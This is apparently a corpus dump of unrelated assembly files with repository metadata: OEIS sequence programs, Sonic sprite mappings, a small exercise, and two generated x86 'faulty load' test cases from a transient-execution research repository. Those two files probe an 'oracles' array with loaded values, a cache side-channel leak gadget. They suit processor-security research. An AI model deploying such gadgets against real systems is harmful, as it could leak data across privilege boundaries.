38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38
*/
| 32.790795 | 2,999 | 0.661095 |
3101645b2b4da13a6dbb942bcfd83c9f04e3ca7a | 613 | asm | Assembly | oeis/018/A018902.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/018/A018902.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/018/A018902.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A018902: a(n+2) = 5*a(n+1) - 3*a(n).
; 1,4,17,73,314,1351,5813,25012,107621,463069,1992482,8573203,36888569,158723236,682950473,2938582657,12644061866,54404561359,234090621197,1007239421908,4333925245949,18647907964021,80237764082258,345245096519227,1485512190349361,6391825662189124,27502591739897537,118337481712920313,509179633344908954,2190885721585783831,9426889707894192293,40561791374713609972,174528287749885472981,750956064625286534989,3231195459876776256002,13903109105508021675043,59821959147909779607209
mov $1,6
mov $2,2
lpb $0
sub $0,1
add $1,$2
add $2,$1
mul $1,3
lpe
mov $0,$1
div $0,6
| 43.785714 | 478 | 0.822186 |
f589288071e25b3dd61f9bc46573e72bc1390ed7 | 1,770 | asm | Assembly | Working Disassembly/General/Sprites/Monitors/Map - Monitor.asm | TeamASM-Blur/Sonic-3-Blue-Balls-Edition | 7e8a2c5df02271615ff4cae529521e6b1560d6b1 | [
"Apache-2.0"
] | null | null | null | Working Disassembly/General/Sprites/Monitors/Map - Monitor.asm | TeamASM-Blur/Sonic-3-Blue-Balls-Edition | 7e8a2c5df02271615ff4cae529521e6b1560d6b1 | [
"Apache-2.0"
] | null | null | null | Working Disassembly/General/Sprites/Monitors/Map - Monitor.asm | TeamASM-Blur/Sonic-3-Blue-Balls-Edition | 7e8a2c5df02271615ff4cae529521e6b1560d6b1 | [
"Apache-2.0"
] | null | null | null | Map_Monitor: dc.w word_1DBBA-Map_Monitor
dc.w word_1DBC2-Map_Monitor
dc.w word_1DBD0-Map_Monitor
dc.w word_1DBDE-Map_Monitor
dc.w word_1DBEC-Map_Monitor
dc.w word_1DBFA-Map_Monitor
dc.w word_1DC08-Map_Monitor
dc.w word_1DC16-Map_Monitor
dc.w word_1DC24-Map_Monitor
dc.w word_1DC32-Map_Monitor
dc.w word_1DC40-Map_Monitor
dc.w word_1DC4E-Map_Monitor
word_1DBBA: dc.w 1 ; DATA XREF: ROM:0001DBA2o
dc.b $F0, $F, 0, 0, $FF, $F0
word_1DBC2: dc.w 2 ; DATA XREF: ROM:0001DBA2o
dc.b $F3, 5, 0, $18, $FF, $F8
dc.b $F0, $F, 0, 0, $FF, $F0
word_1DBD0: dc.w 2 ; DATA XREF: ROM:0001DBA2o
dc.b $F3, 5, 3, $10, $FF, $F8
dc.b $F0, $F, 0, 0, $FF, $F0
word_1DBDE: dc.w 2 ; DATA XREF: ROM:0001DBA2o
dc.b $F3, 5, 0, $1C, $FF, $F8
dc.b $F0, $F, 0, 0, $FF, $F0
word_1DBEC: dc.w 2 ; DATA XREF: ROM:0001DBA2o
dc.b $F3, 5, $20, $20, $FF, $F8
dc.b $F0, $F, 0, 0, $FF, $F0
word_1DBFA: dc.w 2 ; DATA XREF: ROM:0001DBA2o
dc.b $F3, 5, 0, $24, $FF, $F8
dc.b $F0, $F, 0, 0, $FF, $F0
word_1DC08: dc.w 2 ; DATA XREF: ROM:0001DBA2o
dc.b $F3, 5, 0, $30, $FF, $F8
dc.b $F0, $F, 0, 0, $FF, $F0
word_1DC16: dc.w 2 ; DATA XREF: ROM:0001DBA2o
dc.b $F3, 5, 0, $2C, $FF, $F8
dc.b $F0, $F, 0, 0, $FF, $F0
word_1DC24: dc.w 2 ; DATA XREF: ROM:0001DBA2o
dc.b $F3, 5, 0, $34, $FF, $F8
dc.b $F0, $F, 0, 0, $FF, $F0
word_1DC32: dc.w 2 ; DATA XREF: ROM:0001DBA2o
dc.b $F3, 5, 0, $28, $FF, $F8
dc.b $F0, $F, 0, 0, $FF, $F0
word_1DC40: dc.w 2 ; DATA XREF: ROM:0001DBA2o
dc.b $F3, 5, 0, $38, $FF, $F8
dc.b $F0, $F, 0, 0, $FF, $F0
word_1DC4E: dc.w 1 ; DATA XREF: ROM:0001DBA2o
dc.b 0, $D, 0, $10, $FF, $F0
| 37.659574 | 48 | 0.554802 |
44a5b1088695ebc6f8446e06c09ca795bde36247 | 600 | asm | Assembly | programs/oeis/132/A132236.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 22 | 2018-02-06T19:19:31.000Z | 2022-01-17T21:53:31.000Z | programs/oeis/132/A132236.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 41 | 2021-02-22T19:00:34.000Z | 2021-08-28T10:47:47.000Z | programs/oeis/132/A132236.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 5 | 2021-02-24T21:14:16.000Z | 2021-08-09T19:48:05.000Z | ; A132236: Primes congruent to 29 (mod 30).
; 29,59,89,149,179,239,269,359,389,419,449,479,509,569,599,659,719,809,839,929,1019,1049,1109,1229,1259,1289,1319,1409,1439,1499,1559,1619,1709,1889,1949,1979,2039,2069,2099,2129,2309,2339,2399,2459,2549,2579,2609,2699,2729,2789,2819,2879,2909,2939,2969,2999,3089,3119,3209,3299,3329,3359,3389,3449,3539,3659,3719,3779,3929,3989,4019,4049,4079,4139,4229,4259,4289,4349,4409,4649,4679,4799,4889,4919,5009,5039,5099,5189,5279,5309,5399,5519,5639,5669,5849,5879,5939,6029,6089,6269
seq $0,158850 ; Numbers n such that 30*n + 29 is prime.
mul $0,30
add $0,29
| 85.714286 | 478 | 0.763333 |
6e1140faaece05f5216d0e85228226f664b6ade1 | 8,113 | asm | Assembly | Transynther/x86/_processed/NONE/_xt_sm_/i3-7100_9_0x84_notsx.log_21829_1113.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 9 | 2020-08-13T19:41:58.000Z | 2022-03-30T12:22:51.000Z | Transynther/x86/_processed/NONE/_xt_sm_/i3-7100_9_0x84_notsx.log_21829_1113.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 1 | 2021-04-29T06:29:35.000Z | 2021-05-13T21:02:30.000Z | Transynther/x86/_processed/NONE/_xt_sm_/i3-7100_9_0x84_notsx.log_21829_1113.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 3 | 2020-07-14T17:07:07.000Z | 2022-03-21T01:12:22.000Z | .global s_prepare_buffers
s_prepare_buffers:
push %r10
push %r13
push %r8
push %r9
push %rcx
push %rdi
push %rdx
push %rsi
lea addresses_UC_ht+0x1bfd4, %r13
clflush (%r13)
nop
nop
nop
nop
nop
add %r9, %r9
mov (%r13), %rdi
nop
inc %rdx
lea addresses_WC_ht+0xd1d4, %rdx
sub %r13, %r13
mov $0x6162636465666768, %r10
movq %r10, (%rdx)
nop
nop
nop
xor %r9, %r9
lea addresses_normal_ht+0x9d4, %rsi
nop
cmp %r8, %r8
mov $0x6162636465666768, %r13
movq %r13, (%rsi)
nop
nop
nop
nop
and %rdx, %rdx
lea addresses_WC_ht+0x5b54, %r10
nop
nop
nop
nop
and $59392, %rdi
mov $0x6162636465666768, %r9
movq %r9, %xmm3
movups %xmm3, (%r10)
nop
nop
nop
nop
inc %rdi
lea addresses_WC_ht+0x7844, %rsi
nop
nop
nop
nop
inc %r10
vmovups (%rsi), %ymm5
vextracti128 $1, %ymm5, %xmm5
vpextrq $0, %xmm5, %rdi
nop
nop
nop
nop
sub %rsi, %rsi
lea addresses_WT_ht+0x1464, %r9
nop
cmp %rdx, %rdx
vmovups (%r9), %ymm5
vextracti128 $1, %ymm5, %xmm5
vpextrq $0, %xmm5, %r13
nop
nop
nop
nop
nop
inc %rdi
lea addresses_WT_ht+0x1d1d4, %r8
nop
nop
nop
nop
xor $25379, %r9
movl $0x61626364, (%r8)
nop
nop
nop
nop
nop
and $47506, %r8
lea addresses_D_ht+0xa9c, %rsi
lea addresses_WC_ht+0xd054, %rdi
nop
nop
nop
nop
nop
xor %r10, %r10
mov $31, %rcx
rep movsq
nop
nop
inc %rdi
lea addresses_WT_ht+0x883c, %r8
xor %rcx, %rcx
mov $0x6162636465666768, %r10
movq %r10, (%r8)
nop
dec %rdx
lea addresses_UC_ht+0xb2f, %r9
nop
nop
nop
nop
cmp %r8, %r8
mov $0x6162636465666768, %rdi
movq %rdi, %xmm2
vmovups %ymm2, (%r9)
nop
nop
nop
sub %rsi, %rsi
lea addresses_normal_ht+0x1ab54, %r8
add $36655, %rdx
movw $0x6162, (%r8)
nop
nop
nop
and %rsi, %rsi
lea addresses_D_ht+0x1e4d4, %rdi
nop
sub $58826, %rcx
mov $0x6162636465666768, %rdx
movq %rdx, %xmm3
movups %xmm3, (%rdi)
nop
nop
nop
and $4491, %r8
lea addresses_WC_ht+0xf106, %rdx
nop
nop
nop
add $1620, %r8
movw $0x6162, (%rdx)
nop
nop
nop
dec %rdi
lea addresses_A_ht+0x1d3d4, %rsi
lea addresses_A_ht+0x47d4, %rdi
nop
dec %r9
mov $81, %rcx
rep movsb
nop
nop
nop
nop
nop
sub %r9, %r9
lea addresses_D_ht+0x97d4, %rsi
lea addresses_normal_ht+0x2427, %rdi
clflush (%rdi)
nop
nop
cmp $5336, %r8
mov $112, %rcx
rep movsl
nop
nop
nop
nop
sub $9025, %r13
pop %rsi
pop %rdx
pop %rdi
pop %rcx
pop %r9
pop %r8
pop %r13
pop %r10
ret
.global s_faulty_load
s_faulty_load:
push %r11
push %r12
push %r15
push %r8
push %r9
push %rbp
push %rbx
// Store
lea addresses_WT+0x1fd4, %r12
nop
nop
nop
inc %rbp
mov $0x5152535455565758, %r8
movq %r8, %xmm4
vmovups %ymm4, (%r12)
nop
nop
nop
nop
nop
and %r12, %r12
// Faulty Load
lea addresses_WT+0x1fd4, %r11
nop
nop
nop
and %r9, %r9
mov (%r11), %r15
lea oracles, %r8
and $0xff, %r15
shlq $12, %r15
mov (%r8,%r15,1), %r15
pop %rbx
pop %rbp
pop %r9
pop %r8
pop %r15
pop %r12
pop %r11
ret
/*
<gen_faulty_load>
[REF]
{'src': {'type': 'addresses_WT', 'same': False, 'size': 2, 'congruent': 0, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'}
{'dst': {'type': 'addresses_WT', 'same': True, 'size': 32, 'congruent': 0, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'}
[Faulty Load]
{'src': {'type': 'addresses_WT', 'same': True, 'size': 8, 'congruent': 0, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'}
<gen_prepare_buffer>
{'src': {'type': 'addresses_UC_ht', 'same': False, 'size': 8, 'congruent': 8, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'}
{'dst': {'type': 'addresses_WC_ht', 'same': True, 'size': 8, 'congruent': 9, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'}
{'dst': {'type': 'addresses_normal_ht', 'same': True, 'size': 8, 'congruent': 8, 'NT': True, 'AVXalign': False}, 'OP': 'STOR'}
{'dst': {'type': 'addresses_WC_ht', 'same': True, 'size': 16, 'congruent': 5, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'}
{'src': {'type': 'addresses_WC_ht', 'same': False, 'size': 32, 'congruent': 4, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'}
{'src': {'type': 'addresses_WT_ht', 'same': False, 'size': 32, 'congruent': 3, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'}
{'dst': {'type': 'addresses_WT_ht', 'same': True, 'size': 4, 'congruent': 7, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'}
{'src': {'type': 'addresses_D_ht', 'congruent': 3, 'same': False}, 'dst': {'type': 'addresses_WC_ht', 'congruent': 5, 'same': False}, 'OP': 'REPM'}
{'dst': {'type': 'addresses_WT_ht', 'same': True, 'size': 8, 'congruent': 3, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'}
{'dst': {'type': 'addresses_UC_ht', 'same': False, 'size': 32, 'congruent': 0, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'}
{'dst': {'type': 'addresses_normal_ht', 'same': False, 'size': 2, 'congruent': 4, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'}
{'dst': {'type': 'addresses_D_ht', 'same': False, 'size': 16, 'congruent': 7, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'}
{'dst': {'type': 'addresses_WC_ht', 'same': False, 'size': 2, 'congruent': 0, 'NT': False, 'AVXalign': True}, 'OP': 'STOR'}
{'src': {'type': 'addresses_A_ht', 'congruent': 10, 'same': False}, 'dst': {'type': 'addresses_A_ht', 'congruent': 10, 'same': False}, 'OP': 'REPM'}
{'src': {'type': 'addresses_D_ht', 'congruent': 10, 'same': False}, 'dst': {'type': 'addresses_normal_ht', 'congruent': 0, 'same': False}, 'OP': 'REPM'}
{'58': 21829}
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58
*/
| 31.324324 | 2,999 | 0.656601 |
0b12fffd19b0ebeb504663def61205b80de977d8 | 273 | asm | Assembly | exercise2.asm | astrellon/moss | 917250530964d39588cccdb04aa59ab40333d1c3 | [
"MIT"
] | null | null | null | exercise2.asm | astrellon/moss | 917250530964d39588cccdb04aa59ab40333d1c3 | [
"MIT"
] | null | null | null | exercise2.asm | astrellon/moss | 917250530964d39588cccdb04aa59ab40333d1c3 | [
"MIT"
] | null | null | null | main:
PRINT "Input something will ya: "
INPUT r0
PRINT "\nYou inputted: "
PRINT r0
CMP r0 100
>= PRINT "\nToo old\n"
>= JMP end
CMP r0 20
>= PRINT "\nJust right\n"
>= JMP end
PRINT "\nToo young\n"
end:
PRINT "\nDone!\n"
| 13.65 | 37 | 0.531136 |
1bdb212c973bacc35137ff1e5bc4d504c8c6f5c7 | 7,653 | asm | Assembly | Transynther/x86/_processed/NC/_ht_st_zr_un_4k_/i7-7700_9_0x48_notsx.log_21829_324.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 9 | 2020-08-13T19:41:58.000Z | 2022-03-30T12:22:51.000Z | Transynther/x86/_processed/NC/_ht_st_zr_un_4k_/i7-7700_9_0x48_notsx.log_21829_324.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 1 | 2021-04-29T06:29:35.000Z | 2021-05-13T21:02:30.000Z | Transynther/x86/_processed/NC/_ht_st_zr_un_4k_/i7-7700_9_0x48_notsx.log_21829_324.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 3 | 2020-07-14T17:07:07.000Z | 2022-03-21T01:12:22.000Z | .global s_prepare_buffers
s_prepare_buffers:
push %r10
push %r11
push %r14
push %r9
push %rax
push %rcx
push %rdi
push %rsi
lea addresses_UC_ht+0x8544, %r10
cmp %r14, %r14
movw $0x6162, (%r10)
nop
nop
nop
nop
dec %r9
lea addresses_WC_ht+0xd740, %r11
nop
nop
nop
nop
inc %rax
vmovups (%r11), %ymm6
vextracti128 $1, %ymm6, %xmm6
vpextrq $0, %xmm6, %rsi
nop
nop
cmp %r11, %r11
lea addresses_normal_ht+0xdae4, %r14
nop
and %r10, %r10
mov (%r14), %r11w
nop
nop
nop
nop
nop
add %r11, %r11
lea addresses_UC_ht+0x11574, %rsi
lea addresses_WT_ht+0x1e2a9, %rdi
nop
nop
cmp %r11, %r11
mov $104, %rcx
rep movsb
nop
cmp %rcx, %rcx
lea addresses_UC_ht+0x4a44, %rsi
nop
nop
add $46471, %r14
movb $0x61, (%rsi)
nop
nop
and $49232, %rax
lea addresses_WT_ht+0x8984, %r11
nop
and $42466, %r10
mov (%r11), %rax
nop
xor $16802, %r11
lea addresses_normal_ht+0x17a5c, %r11
nop
nop
sub $10938, %rsi
mov $0x6162636465666768, %r14
movq %r14, %xmm2
and $0xffffffffffffffc0, %r11
vmovntdq %ymm2, (%r11)
nop
nop
add $33695, %rcx
lea addresses_D_ht+0x15b67, %rsi
lea addresses_WT_ht+0x1c304, %rdi
clflush (%rsi)
nop
nop
nop
add %r14, %r14
mov $81, %rcx
rep movsq
nop
nop
and $10071, %r10
lea addresses_D_ht+0xe3e4, %rax
nop
nop
nop
add %rsi, %rsi
mov (%rax), %r14w
nop
nop
nop
nop
inc %r9
pop %rsi
pop %rdi
pop %rcx
pop %rax
pop %r9
pop %r14
pop %r11
pop %r10
ret
.global s_faulty_load
s_faulty_load:
push %r10
push %r9
push %rcx
push %rdi
push %rsi
// Store
lea addresses_D+0x18244, %rdi
nop
nop
nop
nop
nop
and %r10, %r10
movl $0x51525354, (%rdi)
nop
nop
nop
add $19062, %rsi
// Faulty Load
mov $0x2e968e0000000244, %rsi
nop
and $39992, %rcx
mov (%rsi), %r9w
lea oracles, %rcx
and $0xff, %r9
shlq $12, %r9
mov (%rcx,%r9,1), %r9
pop %rsi
pop %rdi
pop %rcx
pop %r9
pop %r10
ret
/*
<gen_faulty_load>
[REF]
{'OP': 'LOAD', 'src': {'same': False, 'NT': False, 'AVXalign': False, 'size': 32, 'type': 'addresses_NC', 'congruent': 0}}
{'dst': {'same': False, 'NT': False, 'AVXalign': False, 'size': 4, 'type': 'addresses_D', 'congruent': 11}, 'OP': 'STOR'}
[Faulty Load]
{'OP': 'LOAD', 'src': {'same': True, 'NT': False, 'AVXalign': False, 'size': 2, 'type': 'addresses_NC', 'congruent': 0}}
<gen_prepare_buffer>
{'dst': {'same': False, 'NT': False, 'AVXalign': False, 'size': 2, 'type': 'addresses_UC_ht', 'congruent': 8}, 'OP': 'STOR'}
{'OP': 'LOAD', 'src': {'same': False, 'NT': False, 'AVXalign': False, 'size': 32, 'type': 'addresses_WC_ht', 'congruent': 1}}
{'OP': 'LOAD', 'src': {'same': False, 'NT': False, 'AVXalign': False, 'size': 2, 'type': 'addresses_normal_ht', 'congruent': 4}}
{'dst': {'same': False, 'congruent': 0, 'type': 'addresses_WT_ht'}, 'OP': 'REPM', 'src': {'same': False, 'congruent': 3, 'type': 'addresses_UC_ht'}}
{'dst': {'same': False, 'NT': False, 'AVXalign': False, 'size': 1, 'type': 'addresses_UC_ht', 'congruent': 11}, 'OP': 'STOR'}
{'OP': 'LOAD', 'src': {'same': False, 'NT': False, 'AVXalign': False, 'size': 8, 'type': 'addresses_WT_ht', 'congruent': 2}}
{'dst': {'same': False, 'NT': True, 'AVXalign': False, 'size': 32, 'type': 'addresses_normal_ht', 'congruent': 2}, 'OP': 'STOR'}
{'dst': {'same': False, 'congruent': 6, 'type': 'addresses_WT_ht'}, 'OP': 'REPM', 'src': {'same': False, 'congruent': 0, 'type': 'addresses_D_ht'}}
{'OP': 'LOAD', 'src': {'same': False, 'NT': False, 'AVXalign': False, 'size': 2, 'type': 'addresses_D_ht', 'congruent': 3}}
{'4a': 51, 'ba': 70, '12': 53, '36': 50, '2e': 66, 'f4': 62, '48': 51, '84': 65, 'e6': 69, '16': 67, '6c': 60, '3a': 61, '18': 66, 'bc': 61, '24': 66, '1e': 61, '44': 67, 'de': 76, 'b6': 78, '58': 53, '3e': 55, '4e': 63, '26': 62, 'a6': 58, '0a': 63, 'b0': 58, 'ce': 67, '68': 59, 'd4': 68, '72': 57, '08': 68, 'f6': 62, 'f0': 61, '34': 58, '8e': 51, '14': 56, '70': 65, 'a2': 66, '88': 68, '76': 64, '80': 45, 'f2': 55, '82': 70, 'c8': 57, '10': 59, 'fe': 73, '46': 49, 'e2': 67, '04': 70, '5e': 64, 'a0': 65, '9e': 76, 'd2': 55, '0e': 55, 'f8': 56, 'ec': 68, '74': 52, 'ae': 83, 'dc': 51, 'b4': 72, 'aa': 60, '90': 60, '78': 66, '56': 52, 'ca': 58, 'd0': 54, '60': 46, 'd6': 72, 'da': 49, '20': 55, 'fc': 46, 'ee': 52, 'b8': 50, '52': 58, '5a': 71, '28': 59, 'c2': 69, '2a': 55, '6a': 55, '02': 59, '1a': 61, 'e8': 53, '5c': 65, '0c': 53, '40': 66, 'fa': 52, 'ea': 61, '9c': 55, 'e4': 62, '4c': 72, 'd8': 64, '3c': 61, 'c0': 59, 'c6': 53, '7a': 59, '94': 82, 'ac': 66, '8a': 70, '2c': 58, '06': 60, '54': 13500, '00': 664, '8c': 68, 'b2': 61, 'a4': 53, 'c4': 63, 'be': 50, '64': 46, '38': 50, '7c': 67, '7e': 59, '66': 43, '86': 72, '50': 65, 'a8': 59, 'cc': 59, '30': 62, '22': 68, '6e': 65, '62': 70, '98': 62, '96': 71, '1c': 65, '92': 54, '42': 53, '32': 58, '9a': 57, 'e0': 63}
54 54 da 54 54 54 aa ca 54 54 cc 54 54 54 54 d2 54 58 54 2c 54 54 54 46 54 54 54 54 00 c2 00 54 54 54 08 54 d0 54 54 54 54 40 54 40 54 54 54 90 54 e2 54 6c 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 2a 54 54 54 54 54 54 e0 54 64 58 54 1e 54 80 54 54 54 be 54 a6 54 54 54 54 82 54 fc 54 c8 54 f2 54 54 54 0e ca 54 b4 c2 54 54 e0 54 54 54 54 54 4c 2c 7a 4c 54 7a e2 54 28 54 22 54 6c 54 54 8c b0 2a 02 84 54 0e 54 c4 74 08 ce 54 7c 7c 54 34 54 26 54 c6 54 54 8c 54 54 54 54 54 6c 7c b8 8a 54 54 54 54 70 a2 8c 16 54 54 54 54 54 54 fa 54 c2 dc 54 70 32 54 54 00 8e 54 62 c8 54 a0 b0 6e 54 28 54 54 54 54 54 54 22 54 86 54 54 54 54 54 5c 54 54 54 54 54 54 54 54 54 00 9c 00 54 9e 54 54 54 9c 00 00 1e 54 40 54 9c 54 54 00 54 54 54 66 1e 96 ae 50 54 54 54 54 54 54 00 54 54 54 26 54 54 54 8a 54 90 54 36 54 54 54 54 e6 54 54 54 1c 54 54 54 54 54 c4 54 54 00 02 e6 54 26 54 34 54 d6 54 d4 54 e6 54 54 20 54 54 46 b4 54 18 54 00 14 8c 54 54 54 8c 54 18 56 54 c2 04 7c 54 54 00 54 54 50 00 34 54 54 54 54 54 54 1c 22 54 4e 54 54 54 78 e6 54 54 54 54 5e 1a 54 54 54 00 b6 54 8c 32 bc 44 60 54 74 a8 54 54 02 54 9e 40 54 24 54 54 54 54 54 e4 54 3a 54 54 54 b0 54 54 24 9e 54 a8 2e 82 d0 54 38 a6 54 ca 54 54 54 ec 54 ce 54 68 54 e2 54 54 54 00 54 54 7e 54 54 54 44 00 1c 54 c0 54 54 54 54 e6 54 54 54 26 54 54 54 54 54 54 ac 54 4e 54 5a 54 0c 2a 1a de 54 54 54 54 54 f0 54 54 54 f8 54 76 00 ec 54 54 54 fe 54 18 54 34 54 54 5e 54 54 54 54 00 d6 54 9a 54 00 54 f4 54 54 54 ec 54 54 6c 54 54 54 54 66 54 54 00 2a 54 52 54 54 54 52 52 54 54 54 54 00 54 dc 54 3e 54 54 54 00 54 54 54 54 f4 54 54 5e 00 28 54 4a c2 54 a4 d2 54 54 54 54 da 54 54 54 90 54 1e 54 54 5c 54 88 54 3c 54 54 54 54 54 8a 54 54 54 54 92 54 54 ee 54 54 5c 4c 54 10 54 54 00 20 4a 6e 54 28 00 54 54 8e 5e 54 0a 54 54 54 54 00 54 54 54 a6 72 54 54 54 9c 5e 54 04 8a cc 90 54 de 54 54 54 54 54 54 54 54 bc 8a 46 54 ac 78 54 54 54 52 54 6e 54 54 54 54 54 54 94 54 8e 54 fc 54 74 54 54 54 54 54 3c 54 54 3e 54 54 54 54 54 54 54 54 2a 54 54 54 54 54 ba 54 54 54 08 54 54 54 54 28 54 54 54 54 54 1e 1c f6 54 c4 22 54 e0 54 54 78 54 0a 54 54 54 54 54 54 9c 54 54 54 54 54 54 4a 54 ee 54 54 dc 54 54 54 dc 54 90 54 54 54 54 54 22 54 bc 54 54 54 54 54 54 54 7a 54 9e 04 56 54 54 54 9a 54 02 92 54 54 54 b6 54 b6 54 0a 54 54 54 8c 7c 54 00 8a 2c cc 54 26 54 54 54 ce 54 54 54 54 00 44 54 f6 f0 54 54 54 d4 54 0e 48 54 ac ce 54 4c 8a 54 4a 54 54 00 54 54 54 6c 54 b2 54 54 54 54 54 b4 c6 84 54 54 54 ae 00 ee 54 54 86 54 54 54 54 54 54 54 54 36 ec 54 54 84 54 54 54 54 54 54 9e 54 54 54 78 54 54 54 54 92 54 a6 00 54 54 b6 54 54 a0 54 de 54 40 0a 54 58 b8 54 54 a0 54 54 7e 54 54 54 54 54 76 22 54 54 46 54 54 54 54 54 5e 54 54 54 54 54 54 2c 02 52 c2 48 08 ea 54 54 68 54 54 54 54 00 ac 54 54 54 